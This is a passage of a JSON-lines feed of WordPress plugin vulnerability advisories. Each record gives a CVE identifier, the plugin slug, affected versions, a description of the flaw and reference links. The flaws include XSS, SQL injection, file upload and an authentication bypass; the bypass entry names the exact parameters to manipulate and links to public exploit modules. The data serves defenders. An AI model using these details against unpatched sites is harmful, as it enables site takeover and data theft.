link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-admin.php#L124\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-admin.php#L124\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-admin.php#L350\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-admin.php#L350\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-form.php#L253\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-greet\\\/trunk\\\/wpg-form.php#L253\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225035\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225035\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-greet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-greet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dafc40bf-833a-4d42-b9bc-c7cf2b234ef5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dafc40bf-833a-4d42-b9bc-c7cf2b234ef5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13751","slug":"3d-photo-gallery","versionImpact":"1.3","description":"The 3D Photo Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'des[]' parameter in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-photo-gallery\\\/tags\\\/1.3\\\/plugin.class.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/3d-photo-gallery\\\/tags\\\/1.3\\\/plugin.class.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eae1c878-3df9-47af-8283-de3d5acb219a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eae1c878-3df9-47af-8283-de3d5acb219a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10804","slug":"fwduvp","versionImpact":"10.0","description":"The Ultimate Video Player WordPress & WooCommerce Plugin plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 10.0 via the content\/downloader.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-video-player-wordpress-plugin\\\/8374433\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimate-video-player-wordpress-plugin\\\/8374433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5394abc6-836f-4b22-a7b6-79d092b93a7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5394abc6-836f-4b22-a7b6-79d092b93a7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4578","slug":"file-provider","versionImpact":"1.2.3","description":"The File Provider WordPress plugin through 1.2.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3aa76b96-40b7-4bde-a39c-c1aa6f8278fc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3aa76b96-40b7-4bde-a39c-c1aa6f8278fc\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2025-8315","slug":"wp-easy-contact","versionImpact":"4.0.1","description":"The WP Easy Contact plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018noaccess_msg\u2019 parameter in all versions up to, and including, 4.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-easy-contact\\\/tags\\\/4.0.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-easy-contact\\\/tags\\\/4.0.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337661\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337661\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-contact\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-contact\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229c88ea-c091-43b6-ac4d-31bccdd13a07?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/229c88ea-c091-43b6-ac4d-31bccdd13a07?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9451","slug":"embed-pdf-viewer","versionImpact":"2.4.4","description":"The Embed PDF Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'height' and 'width' parameters in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b616e275-855d-461e-8fcb-c96098e41dfd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b616e275-855d-461e-8fcb-c96098e41dfd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-pdf-viewer\\\/trunk\\\/embed-pdf-viewer.php#L258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-pdf-viewer\\\/trunk\\\/embed-pdf-viewer.php#L258\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-pdf-viewer\\\/trunk\\\/embed-pdf-viewer.php#L144\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-pdf-viewer\\\/trunk\\\/embed-pdf-viewer.php#L144\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-pdf-viewer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-pdf-viewer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164573\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164573\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50496","slug":"ar-for-wordpress","versionImpact":"6.2","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Web and Print Design AR For WordPress allows Upload a Web Shell to a Web Server.This issue affects AR For WordPress: from n\/a through 6.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ar-for-wordpress\\\/wordpress-ar-for-wordpress-plugin-6-2-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ar-for-wordpress\\\/wordpress-ar-for-wordpress-plugin-6-2-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11934","slug":"formaloo-form-builder","versionImpact":"2.1.3.2","description":"The Formaloo Form Maker & Customer Analytics for WordPress & WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018address\u2019 parameter in all versions up to, and including, 2.1.3.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formaloo-form-builder\\\/trunk\\\/formaloo.php#L431\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formaloo-form-builder\\\/trunk\\\/formaloo.php#L431\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formaloo-form-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formaloo-form-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b7ddf44-a1d2-4042-9219-591ebc8e4250?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b7ddf44-a1d2-4042-9219-591ebc8e4250?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-34077","slug":"pie-register","description":"An authentication bypass vulnerability exists in the WordPress Pie Register plugin = 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators. Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/GTSolutions\\\/Pie-Register\",\"name\":\"https:\\\/\\\/github.com\\\/GTSolutions\\\/Pie-Register\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/rapid7\\\/metasploit-framework\\\/blob\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_pie_register_bypass_rce.rb\",\"name\":\"https:\\\/\\\/github.com\\\/rapid7\\\/metasploit-framework\\\/blob\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_pie_register_bypass_rce.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/pieregister.com\\\/\",\"name\":\"https:\\\/\\\/pieregister.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-pie-register-plugin-rce\",\"name\":\"https:\\\/\\\/vulncheck.com\\\/advisories\\\/wordpress-pie-register-plugin-rce\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pie-register\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/pie-register\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/50395\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/50395\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8313","slug":"campus-directory","versionImpact":"1.9.1","description":"The Campus Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018noaccess_msg\u2019 parameter in all versions up to, and including, 1.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/campus-directory\\\/tags\\\/1.9.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/campus-directory\\\/tags\\\/1.9.1\\\/includes\\\/emd-form-builder-lite\\\/emd-form-frontend.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337642\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3337642\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/campus-directory\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/campus-directory\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee031b29-a334-4df4-8c03-4ffd306e38ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee031b29-a334-4df4-8c03-4ffd306e38ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0152","slug":"wp-multi-store-locator","versionImpact":"2.4","description":"The WP Multi Store Locator WordPress plugin through 2.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8281fce2-6f24-4d3f-895f-4d8694806609\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8281fce2-6f24-4d3f-895f-4d8694806609\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2272","slug":"tiempocom","versionImpact":"0.1.2","description":"The Tiempo.com WordPress plugin through 0.1.2 does not sanitise and escape the page parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dba60216-2753-40b7-8f2b-6caeba684b2e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dba60216-2753-40b7-8f2b-6caeba684b2e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4999","slug":"horizontal-scrolling-announcement","versionImpact":"9.2","description":"The Horizontal scrolling announcement plugin for WordPress is vulnerable to SQL Injection via the plugin's [horizontal-scrolling] shortcode in versions up to, and including, 9.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with subscriber-level and above permissions to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf50922a-58a6-4ca4-80b7-cafb37b87216?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf50922a-58a6-4ca4-80b7-cafb37b87216?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcement\\\/trunk\\\/horizontal-scrolling-announcement.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/horizontal-scrolling-announcement\\\/trunk\\\/horizontal-scrolling-announcement.php#L79\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1859","slug":"slider-responsive-slideshow","versionImpact":"1.3.8","description":"The Slider Responsive Slideshow \u2013 Image slider, Gallery slideshow plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization of untrusted input to the awl_slider_responsive_shortcode function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35266cd-41e6-4358-afaa-bc008962f2e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d35266cd-41e6-4358-afaa-bc008962f2e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3041884%40slider-responsive-slideshow&new=3041884%40slider-responsive-slideshow&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3041884%40slider-responsive-slideshow&new=3041884%40slider-responsive-slideshow&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3920","slug":"flattr","versionImpact":"1.2.2","description":"The Flattr WordPress plugin through 1.2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2fb28c77-3c35-4a2f-91ed-823d0d011048\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2fb28c77-3c35-4a2f-91ed-823d0d011048\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9449","slug":"auto-iframe","versionImpact":"1.7","description":"The Auto iFrame plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' parameter in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a09dcc4-37ee-425d-b824-a593c22d711f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1a09dcc4-37ee-425d-b824-a593c22d711f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-iframe\\\/trunk\\\/auto-iframe.php#L127\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-iframe\\\/trunk\\\/auto-iframe.php#L127\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-iframe\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-iframe\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-iframe\\\/trunk\\\/auto-iframe.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-iframe\\\/trunk\\\/auto-iframe.php#L173\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164574\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3164574\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11910","slug":"wp-crowdfunding","versionImpact":"2.1.12","description":"The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp-crowdfunding\/search block in all versions up to, and including, 2.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-crowdfunding\\\/trunk\\\/includes\\\/blocks\\\/Search.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-crowdfunding\\\/trunk\\\/includes\\\/blocks\\\/Search.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206336\\\/wp-crowdfunding\\\/trunk\\\/includes\\\/blocks\\\/Search.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206336\\\/wp-crowdfunding\\\/trunk\\\/includes\\\/blocks\\\/Search.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-crowdfunding\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1541aaf-9f35-44b5-a985-1b8d33228f0a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1541aaf-9f35-44b5-a985-1b8d33228f0a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11899","slug":"slider-pro-lite","versionImpact":"1.4.1","description":"The Slider Pro Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sliderpro' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-slider-renderer.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-slider-renderer.ph
p#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d10036de-940f-4772-9aca-13bc647548d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d10036de-940f-4772-9aca-13bc647548d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11226","slug":"facebook-like-send-button","versionImpact":"1.2","description":"The FireCask Like & Share Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'width' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-like-send-button\\\/tags\\\/1.2\\\/class-frontend.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-like-send-button\\\/tags\\\/1.2\\\/class-frontend.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225838\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225838\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/facebook-like-send-button\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/facebook-like-send-button\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b9d61cd-1955-40d0-99b4-c75f480733f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b9d61cd-1955-40d0-99b4-c75f480733f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13537","slug":"c9-blocks","versionImpact":"1.7.7","description":"The C9 Blocks plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.7.7. This is due the plugin containing a publicly accessible composer-setup.php file with error display enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-blocks\\\/trunk\\\/composer-setup.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-blocks\\\/trunk\\\/composer-setup.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e682fb-e821-45cb-a087-d97d42a3743e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e682fb-e821-45cb-a087-d97d42a3743e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2801","slug":"abcsubmit","versionImpact":"1.2.4","description":"The The Create custom forms for WordPress with a smart form plugin for smart businesses plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.2.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abcsubmit\\\/tags\\\/1.2.4\\\/abcsubmit.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abcsubmit\\\/tags\\\/1.2.4\\\/abcsubmit.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abcsubmit\\\/tags\\\/1.2.4\\\/abcsubmit.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abcsubmit\\\/tags\\\/1.2.4\\\/abcsubmit.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/abcsubmit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/abcsubmit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e45afda4-447a-4d95-90cb-9731b398a009?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e45afda4-447a-